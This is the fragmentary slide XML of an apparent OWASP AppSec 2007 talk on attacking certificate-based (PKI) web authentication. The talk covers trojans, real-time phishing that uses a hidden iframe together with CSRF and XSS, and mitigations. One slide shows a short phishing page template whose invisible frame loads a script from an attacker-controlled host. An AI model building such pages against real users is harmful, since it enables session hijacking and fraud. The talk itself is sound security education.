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CD64-F454-488D-966E-FBA5219BB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7E0F-D128-49A8-87A7-F15B1E13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1F62-352A-475C-A602-603E4BD3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ABF2-ABBA-4CFC-B5A1-2574D1770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3F5A-84F5-4F40-8E6A-E2B57F047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F3C6-6C85-4018-85E8-90943A339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ACD5-AA1F-4C87-A17A-3B77CD3C1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B95F-FC04-4BF9-A34B-F84A6636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5478-155D-422E-8E56-2F3284EF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87F8-1B71-4621-BC18-82F7AC6B5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3894-D8BA-49E8-B521-4A008620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721F-507D-464C-B40A-52FAFF88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A404-43BD-4A94-82BE-F77E6920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224B-8009-417A-A5DC-34D1CF323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213E-1CE1-4686-846A-A61286FB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EDD4-9A04-4698-8684-BA6DE91DE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3357-1B93-400F-9880-89DFC046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68EB-AF42-455C-8228-BC85F5FB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4A4F-F379-44F6-8567-D32B45C7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169D-AF80-4106-B0B2-BFC820543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F4A0-5467-4CED-96FC-10BD0C0D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38F1-1143-4815-AAEA-017FEF272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E079-FD9F-44B4-8417-77D1F9FE2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D7C6-4B8E-41CC-9313-C147FAAFD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4215-5C4D-4416-B636-ABB7891F5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F6CB-C4E9-48D9-8021-52FC0BBA7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3CB2-10D9-4351-9800-7BF4A23D0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8F4C-FDEF-459A-B05F-A4983B0E4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5547-AB6F-45CA-8215-F36B05B60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13ED-E63F-4CC5-85E8-8E48B8AD9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0D7B-20FB-48C3-A346-B0705E0C9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E103-77B3-4049-8D26-30E9F7B29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90B5-40B0-43B3-98CB-59E84989C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E5DF-2632-4840-A458-E69A8D942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72FC-673B-4410-8407-654B41FFE312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1752480" y="6270480"/>
            <a:ext cx="63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 &amp; WASC AppSec 2007 Conference – San Jose – Nov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570852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owasp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038480" y="5013360"/>
            <a:ext cx="4724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2007 - The OWASP Foun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Creative Commons Attribution-ShareAlike 2.5 License. To view this license, visit http://creativecommons.org/licenses/by-sa/2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4038480" y="60260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29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30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="7385040" y="266652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1523880" y="4005360"/>
            <a:ext cx="2210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ahoma"/>
              </a:rPr>
              <a:t>OWASP &amp; WASC AppSec 2007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San Jose – Nov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114800" y="641520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7" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="492120" y="5919840"/>
            <a:ext cx="233532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4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="380880" y="642456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webappsec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The PKI Lie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777777"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t>Attacking Certificate Based Authentic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038480" y="3048120"/>
            <a:ext cx="4648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ahoma"/>
              </a:rPr>
              <a:t>Ofer Ma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ahoma"/>
              </a:rPr>
              <a:t>CTO, Hack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14800" y="3886200"/>
            <a:ext cx="1733400" cy="237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14800" y="4267080"/>
            <a:ext cx="4524480" cy="6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5349-8EFE-4217-BC7A-BE1D3A89187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ent Side Attacks - Troja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takeover of smartcard / t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imple Way – Cached P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ard Way – Stealing &amp; Using P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#1 – Obtaining P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Log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B Sniffers (Encryption might be a problem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 Manip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#2 – Utilizing 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 Based Macro (Visible to user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DLL Access – Silent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3505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the most prominent attacks to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ely solved by PKI…” (or not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494240" cy="512604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CAD7-C9A1-4EF7-8D10-A1490B5BD1F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ent Side Attacks - Phi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D7D3-7495-41B3-A80F-A56947C308D4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al Time PKI Phishing - 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Phishing provides a mean for overcoming the need of credentials th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than being stolen, the credentials are used in real time, while the device is plu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hijacked, the attacker can exploit the existing credentials using CSRF, Reflected XSS or other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common with other CSRF/XSS attacks, the user has little, if any, way of preventing th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E4AE-8AE7-471B-B5C7-544D2963E7F3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al Time PKI Phishing - Analysi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ack is performed by creating a faked site (much like regular Phishing atta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ite has no content, and contains 2 fra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rame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Uses entire screen area and presents the real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rame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Invisible, and is used for taking advantage of the logged on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zing cross domain techniques (CSRF, JavaScript inclusion, etc.) Frame II, already authenticated, is used to launch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555D-6649-4CD9-A48B-88697BED9D46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al Time PKI Phishing - Flo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follows link to malicious (Phished)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ponse includes an empty content HTML, as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914640" y="4362480"/>
            <a:ext cx="5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1240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429000"/>
            <a:ext cx="7696440" cy="2455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lt;HTML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lt;IFRAME WIDTH=100% HEIGHT=100% NAME=REAL FRAMEBORDE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RC=“http://www.myREALsite.com/”&gt;&lt;/IFR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lt;IFRAME WIDTH=0% HEIGHT=0% NAME=EVIL FRAMEBODER=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lt;/IFR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lt;SCRIPT SRC=http://www.myFAKEsite.com/dobad.js&gt;&lt;/SCRI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lt;/HTML&g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24BD-B6DE-49C0-89BE-8EC26528B246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al Time PKI Phishing – Flow (Cont’d)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r is then presented with the Certificate selection – The user experience is IDEN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914640" y="4362480"/>
            <a:ext cx="5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1240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477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44F6-4DC6-4FD4-93DB-DF8914B1D11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al Time PKI Phishing – Flow (Cont’d)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he user has logged on, the user is able to browser through th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alicious site is now able to perform navigation events o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r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llows execution of any operation in the site on behalf of th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914640" y="4362480"/>
            <a:ext cx="5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1240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94360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BE1-2F89-438A-A333-986E604BA509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al Time PKI Phish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Demo…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AC8B-F12B-4EE6-A425-C7AB4A9D295E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al Time PKI Phishing Limit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Viewing – May not be possible (Cross Site Limit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s on CSRF Capabilities (Won’t work well in .Net…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 – both limitations are easily bypassed with Reflected X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hishing site provides the persistency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SS can then be used to access sensitiv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SS can also be used to obtaining whatever random data required to overcome CSRF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9924-72B1-4B3A-B6ED-FA440F1448B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ditional Real Time PKI Phishing Aspec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rietary ActiveX based authentication (As opposed to integrated browser certificate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ing when the main frame has been successfully authenticated – can be performed using cross domain exploits (e.g. JS inclu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 in the Middle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CSRF/XSS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a connection with the client, and relay the challenge from the original server to the cl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ght generate some warnings, but users tend to ignore those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9D27-BC41-4B5A-8E5B-F1A710C8804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and more organizations are examining PKI solutions (client cert authentication) to provide an answer to modern authentication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resentation will examine the common notions about PKI in web applications and present various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ecture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ing to reveal any flaws in RSA or Digital Signatures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oing to present how poor implementation can allow hackers to work around it…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82EE-82B6-45B9-BA2D-5C4FD1B30A7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ding PKI authentication in web applications i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ot a magic solut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ojans, Pharming, Phishing, CSRF, XSS, as well as other applications vulnerabilities, remain a significant conc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problems must be addressed well before implementing client side certif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that said – client side certificates stored on secure physical device are still a very strong form of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6B43-5AF8-449A-89ED-C7FC10B43A77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itig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RF Protection – Massively discussed yester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SS Protection – Massively discussed for the past few year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ojans Protection – Tricky (Requires taking the PC out of the equation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Device PIN Input &amp;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Device Biometric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Device “OK” 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n From-Device OS Boot (Might work with virtualization as well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2585-0B9E-4881-8E6C-1E840D185A88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69D0-FB74-4461-821C-1A91C35CB1C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redential Theft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ed PKI Authentication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ks on PKI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r Application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j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KI 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i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9354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2E4A-B21A-4D62-9839-58B6DD02238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mmon Credentials Theft Threa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ishing/Phar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licious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S Hij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jan/Mal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Phishing Against O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oj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 Moni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Logg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SS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Hij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SS Based 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18040" y="1371600"/>
            <a:ext cx="2032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941D-5013-4A33-B540-E8455ABC528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uggested Solution – PKI &amp; Client Cer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KI Authentication Combi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mething you Hav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martcard / Tok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mething you Kn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modern implementations are seeking to replace the PIN with biometric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requires the physical device to be plugged in (Private key stored on dev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bination of smart card, PIN, and the strength of RSA, is why many consider PKI authentication as hack proof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20680800">
            <a:off x="7315200" y="1066320"/>
            <a:ext cx="13716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4870-230E-443B-9A6D-D2B5B217487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“Hack Proof” notion, urges organizations to switch to PKI based authentication at high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ncial Organ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banks are deploying PKI authentication for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lutions are considered so secure – that previous Phishing/Pharming warnings are remove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signatures are now legally val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ome countries – they are considerably more abiding than normal sign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he PKI Lie – A Hack Proof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0680800">
            <a:off x="7467480" y="380520"/>
            <a:ext cx="13716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520B-1D74-4CFF-AC2D-0095B0FB8068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PKI Authentication is not Hack Pro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in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trong encryption &amp; authentication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ed robust implementation (Common Crite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s in Practic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the solution with the surrounding environment may allow comprom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Point Integration (PC/User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Application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performing real tim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he PKI (sad) Tr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0437200">
            <a:off x="6566040" y="4539960"/>
            <a:ext cx="20574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22E5-21A5-45A0-89DC-E1C3689A235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pplication Integration Flaw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Authentication Verification by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Session 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ying on session information for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inding of application session and SSL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SS Vulner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h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of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cation of Signing Operations (if cache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ky is the limit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9360-987F-407A-A9CD-68CB1F42A8B9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ent Side Attacks – Troja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ojans - No #1 Pharm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772400" cy="3770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457200" y="56386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also useful for direct data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5:35:24Z</dcterms:created>
  <dc:creator>OWASP</dc:creator>
  <dc:description>http://www.owasp.org</dc:description>
  <cp:keywords>Application Security</cp:keywords>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy>Ofer Maor</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2007-11-15T21:03:12Z</dcterms:modified>
  <cp:revision>59</cp:revision>
  <dc:subject>Application Security</dc:subject>
  <dc:title>OWASP AppSec 2004 Presentation</dc:title>
</cp:coreProperties>
</file>